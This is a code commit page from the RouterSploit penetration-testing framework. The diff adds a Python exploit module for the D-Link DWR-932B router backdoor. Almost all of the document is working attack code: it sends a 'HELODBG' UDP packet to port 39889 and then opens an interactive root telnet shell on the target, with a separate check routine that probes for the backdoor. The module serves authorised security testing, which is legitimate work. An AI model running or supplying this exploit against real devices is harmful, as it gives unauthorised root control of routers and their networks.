D-Link DWR-932B Backdoor exploit

27168c10 · Marcin Bury · 57ce54e2 · 27168c10
Commit 27168c10 authored Oct 19, 2016 by Marcin Bury
Show whitespace changes
Inline Side-by-side

Showing with 75 additions and 0 deletions

dwr_932b_backdoor.py routersploit/modules/exploits/dlink/dwr_932b_backdoor.py +75 -0

No files found.
--- a/routersploit/modules/exploits/dlink/dwr_932b_backdoor.py
+++ b/routersploit/modules/exploits/dlink/dwr_932b_backdoor.py
+import socket
+import telnetlib
+from routersploit import (
+    exploits,
+    print_error,
+    print_success,
+    print_status,
+    mute,
+)
+class Exploit(exploits.Exploit):
+    """
+    Exploit implementation for D-Link DWR-932B backdoor vulnerability.
+    If the target is vulnerable, telnet access is provided with root privileges.
+    """
+    __info__ = {
+        'name': 'D-LINK DWR-932B',
+        'description': 'Module exploits D-Link DWR-932B backdoor vulnerability which allows executing command on operating system level with root privileges.',
+        'authors': [
+            'Pierre Kim @PierreKimSec',  # vulnerability discovery
+            'Marcin Bury <marcin.bury[at]reverse-shell.com>',  # routersploit module
+        ],
+        'references': [
+            'https://pierrekim.github.io/advisories/2016-dlink-0x00.txt',
+        ],
+        'devices': [
+            'D-Link DWR-932B',
+        ]
+    }
+    target = exploits.Option('', 'Target address e.g. 192.168.1.1')
+    port = exploits.Option(80, 'Target Port')
+    def run(self):
+        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+        print_status("Sending backdoor packet...")
+        try:
+            sock.sendto("HELODBG", (self.target, 39889))
+            response = sock.recv(1024)
+        except:
+            pass
+        sock.close()
+        if "Hello" in response:
+            print_success("Target seems to vulnerable")
+            print_status("Trying to connect to the telnet service {}:{}".format(self.target, 23))
+            try:
+                tn = telnetlib.Telnet(self.target, 23)
+                tn.interact()
+            except:
+                print_error("Exploit failed - could not connect to the telnet service")
+        else:
+            print_error("Exploit failed - target seems to be not vulnerable")
+    @mute
+    def check(self):
+        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+        try:
+            sock.sendto("HELODBG", (self.target, 39889))
+            response = sock.recv(1024)
+            if "Hello" in response:
+                sock.sendto("BYEDBG", (self.target, 39889))
+                return True  # target is vulnerable
+        except:
+            pass
+        return False  # target is not vulnerable